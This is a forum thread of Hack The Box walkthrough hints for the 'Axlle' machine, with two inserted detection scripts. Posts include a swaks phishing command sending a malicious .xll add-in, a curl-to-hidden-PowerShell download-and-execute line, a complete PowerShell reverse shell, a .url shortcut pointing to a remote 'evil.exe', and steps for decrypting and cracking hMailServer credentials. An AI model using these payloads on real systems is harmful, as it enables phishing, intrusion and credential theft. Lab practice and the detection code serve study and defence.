HTB - Axlle
by Sqweez - Saturday June 22, 2024 at 06:57 PM
#51
any hint for user flag

#52
Is there any RDP fuckery as matrix user (or any user)?
I thought I saw that in bloodhound

Or is it more 'phishing' until root (the guy fishing on the boat was the emblem which explains a lot) ?
#53
(Jun 23, 2024, 07:33 AM)Sqweez Wrote:
(Jun 23, 2024, 07:28 AM)game95 Wrote: After get shell what to get user flag?

in C:\Program Files (x86)\hMailServer you have some config files with a password hash. Use https://github.com/GitMirar/hMailDatabas...dDecrypter to unhash the password for the MSSQL database

Apparently it's an hMailServer SHA256 hash for the email account "accounts@axlle.htb". Unable to crack it with hashcat / crackstation.

hashcat --identify accounts-axlle.htb.hash

The following hash-mode match the structure of your input hash:

      # | Name                                                      | Category
  ======+============================================================+======================================
  1421 | hMailServer                                                | FTP, HTTP, SMTP, LDAP Server
#54
(Jun 23, 2024, 07:33 AM)Sqweez Wrote:
(Jun 23, 2024, 07:28 AM)game95 Wrote: After get shell what to get user flag?

in C:\Program Files (x86)\hMailServer you have some config files with a password hash. Use https://github.com/GitMirar/hMailDatabas...dDecrypter to unhash the password for the MSSQL database

How to open hMailServer.sdf after getting a password?
#55
winpeas with 'dallon.matrix' shell reveals some interesting info.
#56
(Jun 23, 2024, 09:00 AM)jimmyshoemacher Wrote:
(Jun 23, 2024, 04:12 AM)bmoon10 Wrote:
(Jun 23, 2024, 04:04 AM)gihimlek Wrote:
(Jun 23, 2024, 03:58 AM)fuckhackthebox Wrote:
(Jun 23, 2024, 03:54 AM)osamy7593 Wrote: Maybe an internet issue: close your VM and try again. If not, download xllpoc, go to dllmain.cpp and put the code; after that, open xllpoc.sln in VS and build it. The .dll will be created; rename it to .xll and after that send.

appreciate the advice man but I've done that

i even just swapped vpn regions and everything and still nothing

i give up for the night lmao

Same ....

couple of things:

1. swaks that I've used and worked:

swaks --to accounts@axlle.htb --from it@axlle.htb --header "Subject: ws" --body "check" --attach @ws.xll

2. PowerShell execution - made the rev shell work with the addition of a command in the xll example cpp file

system ("curl http://<IP>:<PORT>/revsh.ps1 | powershell -nop -W hidden -noni -ep bypass -f  -");

revsh.ps1

$TCPClient = New-Object Net.Sockets.TCPClient('<IP>', <PORT>);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()

Replace <IP>,<PORT> with your IP, PORT

cheers

what did you use to make the xll file?

I tried using the HelloWorld and Octoberfest XLL_Phishing github repos to create the xll but I don't ever see any traffic on my http server

I used HelloWorld XLL (applied the necessary changes), modified xlAutoOpen to execute system("powershell -e ...") and that's it
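A detection-side view of the technique in the post above, as an added example that is not part of the original thread: an add-in that calls system() from xlAutoOpen makes Excel the parent of cmd.exe, so process-creation telemetry shows the lineage and the PowerShell switches quoted in the thread. The field names follow Sysmon Event ID 1 (ParentImage, Image, CommandLine); the records, the 192.0.2.10 address and the base64 string are constructed.

```python
import re
from pathlib import PureWindowsPath

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "curl.exe"}

# Switches that appear in the thread's command lines, with their long forms.
FLAG_PATTERNS = {
    "no_profile": re.compile(r"(?i)(?<!\S)-nop(rofile)?\b"),
    "hidden_window": re.compile(r"(?i)(?<!\S)-w(indowstyle)?\s+hidden\b"),
    "policy_bypass": re.compile(r"(?i)(?<!\S)-(ep|executionpolicy)\s+bypass\b"),
    "encoded_command": re.compile(r"(?i)(?<!\S)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"),
    "stdin_script": re.compile(r"(?i)(?<!\S)-f(ile)?\s+-(\s|$)"),
    "pipe_to_powershell": re.compile(r"(?i)\|\s*powershell"),
}

def image_name(path):
    return PureWindowsPath(path).name.lower()

def score_event(event):
    """Return (is_alert, reasons) for one process-creation record."""
    if (image_name(event["ParentImage"]) not in OFFICE_PARENTS
            or image_name(event["Image"]) not in SHELL_CHILDREN):
        return False, []
    cmdline = event.get("CommandLine", "")
    flags = [name for name, rx in FLAG_PATTERNS.items() if rx.search(cmdline)]
    return True, ["office_spawned_shell"] + flags

def alerts(events):
    """Return (command line, reasons) for every record that alerts."""
    scored = [(e["CommandLine"], score_event(e)) for e in events]
    return [(cmd, reasons) for cmd, (hit, reasons) in scored if hit]

def ev(parent, image, cmd):
    return {"ParentImage": parent, "Image": image, "CommandLine": cmd}

# Constructed records, not real telemetry.
XL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    ev(XL, CMD, "cmd.exe /c curl http://192.0.2.10:8000/script.ps1 | "
                "powershell -nop -W hidden -noni -ep bypass -f  -"),
    ev(XL, CMD, "cmd.exe /c powershell -e QUJDREVGR0hJSktMTU5PUA=="),
    ev(r"C:\Windows\explorer.exe", CMD, "cmd.exe /c powershell -nop"),
    ev(XL, r"C:\Windows\splwow64.exe", "splwow64.exe 8192"),
]

if __name__ == "__main__":
    for cmdline, reasons in alerts(SAMPLE_EVENTS):
        print(reasons, "<-", cmdline)
```

The parent/child pair alone raises the alert; the flag names only add triage context, so an add-in that launches a shell without those switches is still reported.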
#57
(Jun 23, 2024, 07:11 AM)maggi Wrote:
(Jun 23, 2024, 06:32 AM)ritualist Wrote:
(Jun 23, 2024, 05:09 AM)maggi Wrote: anyone have a tip on how to move on from gideon after finding the hmail creds?

Didn't use those creds. But there is a hint in an email in the Data folder.
Something like this worked for me
$url = "file:////10.10.x.x/share/evil.exe"
$shortcutPath = "C:\inetpub\testing\shortcut.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent

Good looks I didn't think of that!
 I knew it was a link but I always forget I can share a share

What is a payload of evil.exe could you share pls?
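For defenders, the shortcut file described in the post above can be found by sweeping writable directories for .url files whose target is a remote file share. This is an added example, not part of the original thread; the function names, the sample content and the 192.0.2.10 address are constructed.

```python
from pathlib import Path
from urllib.parse import urlsplit

def shortcut_target(text):
    """Return the URL= value of the [InternetShortcut] section, or None."""
    section = None
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "internetshortcut" and "=" in line:
            key, value = line.split("=", 1)
            if key.strip().lower() == "url":
                return value.strip()
    return None

def remote_host(url):
    """Return the remote host a file:// or UNC target points at, else None."""
    u = url.strip().replace("\\", "/")
    if u.startswith("//"):                       # raw UNC path \\host\share\...
        u = "file:" + u
    parts = urlsplit(u)
    if parts.scheme.lower() != "file":
        return None
    if parts.netloc and parts.netloc.lower() != "localhost":
        return parts.netloc                      # file://host/share/...
    if parts.path.startswith("//"):              # file:////host/share/...
        return parts.path.lstrip("/").split("/", 1)[0] or None
    return None                                  # file:///C:/... is local

def scan(root):
    """List (path, target, host) for each .url under root with a remote file target."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() == ".url":
            target = shortcut_target(path.read_text(encoding="utf-8", errors="replace"))
            host = remote_host(target) if target else None
            if host:
                findings.append((str(path), target, host))
    return findings

if __name__ == "__main__":
    # Constructed sample in the layout the post's Set-Content call produces.
    sample = "[InternetShortcut]\r\nURL=file:////192.0.2.10/share/tool.exe\r\n"
    print(remote_host(shortcut_target(sample)))
```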
#58
Any hint for root? Entered the matrix, got some DB creds...
#59
(Jun 23, 2024, 11:32 AM)jimmyshoemacher Wrote: anyone know how to use the hMailServer creds once you get the password?

1. hMailServer administrator encrypted pass is not crackable but the sqlserver pass is.

2. you can download the hMailserver.sdf and use the right tools + password to login into the database

3. dump the SHA256 password hashes of mail account holders from the table

4. try to crack the SHA256 hash with john / hashcat.

It might be a dead end; nevertheless, exploring all the avenues is a good thing.
#60
any hint from app-devs to root ?